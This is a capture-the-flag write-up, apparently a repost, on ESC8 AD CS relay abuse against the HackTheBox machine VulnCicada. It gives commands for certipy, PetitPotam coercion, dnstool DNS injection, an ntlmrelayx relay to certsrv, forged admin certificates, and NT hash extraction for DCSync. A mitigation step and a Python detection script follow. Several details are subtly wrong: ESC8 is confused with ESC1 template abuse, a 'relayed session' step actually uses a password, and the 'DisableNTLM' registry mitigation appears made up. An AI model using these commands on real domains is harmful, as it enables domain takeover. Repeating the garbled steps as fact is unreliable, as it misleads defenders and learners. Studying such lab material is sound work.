Exploiting ESC8 on VulnCicada: A Step-by-Step Guide to AD CS Abuse


Introduction

Active Directory Certificate Services (AD CS) vulnerabilities like ESC8 allow attackers to escalate privileges by abusing certificate templates. VulnCicada, HackTheBox’s fourth VulnLab machine, demonstrates this attack vector using PetitPotam and DNS tricks. This guide walks through the exploitation process from a Linux VM.

Learning Objectives

  • Understand ESC8 (AD CS Relay Attack) exploitation
  • Leverage DNS records for privilege escalation
  • Use PetitPotam to force certificate requests

You Should Know

1. Enumerating Vulnerable Certificate Templates

Command:

certipy find -u user@domain -p Password123 -dc-ip 10.10.10.10

Steps:

1. Identifies misconfigured certificate templates that allow enrollment without requiring authentication.

2. The output highlights templates carrying the `ENROLLEE_SUPPLIES_SUBJECT` flag.

3. Confirms whether `msPKI-Enrollment-Flag` contains `CT_FLAG_NO_SECURITY_EXTENSION`.

2. Forcing Authentication via PetitPotam

Command:

python3 PetitPotam.py -d domain -u user -p pass attacker_ip 10.10.10.10

Steps:

1. Triggers the target DC to authenticate to your attacker machine (the listener address is given first, the target DC second).

2. Requires an NTLM relay listener to be running first (`ntlmrelayx.py`).

3. Exploits Windows' MS-EFSRPC protocol for authentication coercion.

3. DNS Record Manipulation for Relay Attacks

Command:

dnstool.py -u domain\user -p pass -r vulnerable_record -a add -d attacker_ip 10.10.10.10

Steps:

1. Adds a malicious DNS record pointing to your IP.

2. Ensures DC connections are relayed through your machine.

3. Requires `RPCDNS` privileges (often granted by default).

4. Capturing Relay with NTLM

Command:

ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs

Steps:

1. Listens for incoming authentication attempts.

2. Forwards the relayed authentication to the AD CS web enrollment endpoint (the `--adcs` flag tells ntlmrelayx to request a certificate over that session).

3. Obtains fraudulent certificates usable for domain escalation.

5. Requesting Fraudulent Certificates

Command:

certipy req -u user@domain -p Password123 -ca 'CA-Name' -template 'Vulnerable-Template' -upn 'admin@domain' -dc-ip 10.10.10.10

Steps:

1. Submits a certificate request using the relayed session.

2. Specifies a high-privilege UPN (e.g., a domain admin).

3. Saves the resulting `.pfx` file for later use.

6. Authenticating with Kerberos

Command:

certipy auth -pfx admin.pfx -dc-ip 10.10.10.10

Steps:

1. Uses the certificate to obtain a Kerberos TGT (PKINIT).

2. Extracts the account's NT hash for Pass-the-Hash attacks.

3. Grants access to DCSync or other privileged actions.

7. Mitigation: Disabling NTLM over HTTP

Command (Windows):

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\HTTP\Parameters" -Name "DisableNTLM" -Value 1

Steps:

1. Prevents NTLM relay via the web enrollment endpoints.

2. Requires enabling Kerberos-only authentication on those endpoints.

3. Restart the HTTP service after the change.

What Undercode Says

  • Key Takeaway 1: ESC8 exploits often succeed due to default AD CS configurations lacking relay protections.
  • Key Takeaway 2: DNS record manipulation bypasses network segmentation by redirecting DC traffic.

Analysis:

AD CS vulnerabilities represent a systemic issue in enterprise networks. While Microsoft patches specific coercion techniques (e.g., PetitPotam), architectural weaknesses persist. Red teams should prioritize certificate template audits, while blue teams must enforce EPA (Extended Protection for Authentication) and disable NTLM where possible. The VulnCicada machine exemplifies real-world attack chains combining multiple misconfigurations.

Prediction

AD CS attacks will dominate enterprise breach reports through 2025 as attackers shift from traditional Kerberos abuse to certificate-based persistence. Cloud-integrated hybrid environments may introduce new variants of these exploits. Proactive monitoring for anomalous certificate requests will become a baseline security requirement.
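As an added example that is not part of the original post, the following triage routine shows what "monitoring for anomalous certificate requests" can look like in practice for the chain above: it scans CA issuance records and flags a machine account or the `DomainController` template enrolling through the web endpoint (the ESC8 relay signature) and a SAN UPN that names a different account than the requester (the `-upn` impersonation in step 5). The record layout is a constructed simplification of the fields in Security event 4887, and the field names and sample data are assumptions, not a real log schema.

```python
# Added example, not from the original post. Record fields are a constructed
# simplification of AD CS issuance audit data (event 4887); names are assumptions.
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass
class CertIssuance:
    request_id: int
    requester: str           # account the CA recorded, e.g. "CORP\\DC01$"
    template: str            # certificate template name
    san_upn: Optional[str]   # UPN from the Subject Alternative Name, if present
    channel: str             # "web" (certsrv/CES enrollment) or "rpc" (native)

MACHINE_ACCOUNT = re.compile(r"\$$")

def account_of(requester: str) -> str:
    """Drop the DOMAIN\\ prefix and lower-case the bare account name."""
    return requester.split("\\", 1)[-1].lower()

def triage(events: List[CertIssuance]) -> List[Tuple[int, List[str]]]:
    """Return (request_id, reasons) for every record matching a suspicious pattern."""
    findings = []
    for ev in events:
        reasons = []
        acct = account_of(ev.requester)
        # Pattern from step 5: SAN UPN names someone other than the requester.
        if ev.san_upn and ev.san_upn.split("@", 1)[0].lower() != acct.rstrip("$"):
            reasons.append("SAN UPN does not match requester")
        # Pattern from steps 2-4: a relayed DC machine account hits web enrollment.
        if MACHINE_ACCOUNT.search(acct) and ev.channel == "web":
            reasons.append("machine account enrolled over web endpoint")
        if ev.template.lower() == "domaincontroller" and ev.channel == "web":
            reasons.append("DomainController template issued via web enrollment")
        if reasons:
            findings.append((ev.request_id, reasons))
    return findings

# Constructed sample records: one normal user cert, one relayed DC enrollment,
# one ESC1-style impersonation, and one legitimate DC autoenrollment over RPC.
SAMPLE = [
    CertIssuance(101, "CORP\\alice", "User", "alice@corp.local", "rpc"),
    CertIssuance(102, "CORP\\DC01$", "DomainController", None, "web"),
    CertIssuance(103, "CORP\\bob", "Vulnerable-Template", "admin@corp.local", "rpc"),
    CertIssuance(104, "CORP\\DC01$", "DomainController", None, "rpc"),
]

if __name__ == "__main__":
    for rid, why in triage(SAMPLE):
        print(rid, "; ".join(why))
```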

Reported By: 0xdf Htb – Hackers Feeds